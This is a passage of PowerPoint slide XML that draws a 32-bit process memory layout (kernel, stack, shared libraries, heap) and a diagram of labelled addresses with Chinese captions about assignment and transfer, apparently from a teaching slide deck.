                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="6964304" y="1962280"/>
                    <a:ext cx="690098" cy="0"/>
                  </a:xfrm>
                  <a:prstGeom prst="straightConnector1">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="dk2"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                    <a:round/>
                    <a:headEnd type="none" w="med" len="med"/>
                    <a:tailEnd type="triangle" w="med" len="med"/>
                  </a:ln>
                </p:spPr>
              </p:cxnSp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="197" name="Shape 636">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DEB047-DA8D-413A-96B5-62A813B6080C}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="7051624" y="1680540"/>
                    <a:ext cx="1287214" cy="38944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000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:rPr>
                      <a:t>addr9</a:t>
                    </a:r>
                    <a:endParaRPr sz="1000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="198" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D3059D-D208-4B52-A9DB-A4174BFC6202}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7054617" y="820145"/>
                  <a:ext cx="1287214" cy="38944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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr13</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87" name="组合 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB70DBE-124A-43E1-8D58-CCCC4C6F89CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7869461" y="391576"/>
              <a:ext cx="4000038" cy="1579457"/>
              <a:chOff x="7869461" y="391576"/>
              <a:chExt cx="4000038" cy="1579457"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="396" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D6F199-08E9-4085-9672-8D323ED68E9E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7875980" y="1550828"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="399" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A60469-807F-40E9-89EB-93862332BDFC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7869461" y="1971033"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="401" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B0EAF5-A2A8-495D-819A-664FB016F59C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7946824" y="832650"/>
                <a:ext cx="1258039" cy="38944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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr12</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="403" name="组合 402">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F369D81-B85A-461C-A5D1-FB2774703040}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7875310" y="391576"/>
                <a:ext cx="1329554" cy="389440"/>
                <a:chOff x="6615347" y="254667"/>
                <a:chExt cx="1329554" cy="389440"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="404" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461E6BAF-D63D-4E5C-8316-9EEAADB42A75}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6686862" y="254667"/>
                  <a:ext cx="1258039" cy="38944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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr14</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="405" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A8C509F-E14D-4B5B-B6B6-75AB429CF78B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="文本框 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A13E565-C4E0-47FC-8289-AD422F09D114}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10271663" y="442027"/>
                <a:ext cx="640633" cy="276999"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                  <a:t>先赋值</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="248" name="文本框 247">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EAF3C0-43F5-440A-A24C-0F363637D059}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10294710" y="1325194"/>
                <a:ext cx="645272" cy="276999"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                  <a:t>先赋值</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="249" name="文本框 248">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B811221C-EE72-4ED7-86DF-92572B096B47}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11228866" y="555978"/>
                <a:ext cx="640633" cy="276999"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                  <a:t>后转移</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="250" name="文本框 249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A00EDD9A-B2E4-437E-B562-2524F452B20A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11217822" y="1503891"/>
                <a:ext cx="651677" cy="276999"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                  <a:t>后转移</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Shape 624">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC1B73C-666C-4B66-9F32-D0BCBF377D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="62145" y="-150921"/>
            <a:ext cx="3457018" cy="6549169"/>
            <a:chOff x="4352868" y="648524"/>
            <a:chExt cx="1907882" cy="3727226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 625">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D686D74F-3ADD-4A3A-AFD0-EC6DC8910C9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="826803"/>
              <a:ext cx="1363200" cy="452089"/>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i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>For</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Kernel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（内核空间）</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Shape 626">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC56A8DF-996E-4E31-ABB4-70FCA9C19549}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1283837"/>
              <a:ext cx="1363200" cy="538658"/>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i="1" dirty="0"/>
                <a:t>Stack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（栈空间）</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Shape 627">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1CD2A05-3682-4927-98EF-35B9D7162401}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1822500"/>
              <a:ext cx="1363200" cy="453701"/>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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（预留给栈未使用空间）</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Shape 628">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E4EA5AD-473F-425B-92BB-E98266807C45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2271256"/>
              <a:ext cx="1363200" cy="333429"/>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i="1" dirty="0"/>
                <a:t>shared</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" i="1" dirty="0"/>
                <a:t>libraries</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（动态库空间）</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 629">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C97F2F3F-6DCF-4B69-A6B1-9226C37F1B10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2604686"/>
              <a:ext cx="1363200" cy="333429"/>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zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（预留给堆未使用空间）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Shape 630">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753D0CD8-0A3D-479D-A413-DF4BAC03EA22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2938116"/>
              <a:ext cx="1363200" cy="417526"/>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i="1" dirty="0"/>
                <a:t>Heap</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（堆空间）</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Shape 633">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CDD31C-38A7-4013-B2E6-D95A8FF66399}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897549" y="4020471"/>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i="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Unused</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（保留空间）</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Shape 634">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{070B847A-5BFE-458C-BE03-DCC7EA37F72B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5986497" y="1341974"/>
              <a:ext cx="0" cy="590731"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent5"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent5"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent5"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Shape 635">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FEA076-E22D-41E6-8E13-371287C0E35B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5986497" y="2868350"/>
              <a:ext cx="0" cy="487292"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="non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16" name="Shape 636">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90F1D62-8E3F-44A5-8965-B2C61B67B817}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4437065" y="648524"/>
              <a:ext cx="804735" cy="274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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xFFFFFFFF</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Shape 637">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930E48F8-B909-4AE2-A6BA-3507F6AD0D38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4437065" y="1068156"/>
              <a:ext cx="804735" cy="274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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Shape 638">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE49D62-A898-46BA-90F4-73916A5AFD8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4437065" y="2389716"/>
              <a:ext cx="804735" cy="274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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x40000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Shape 639">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
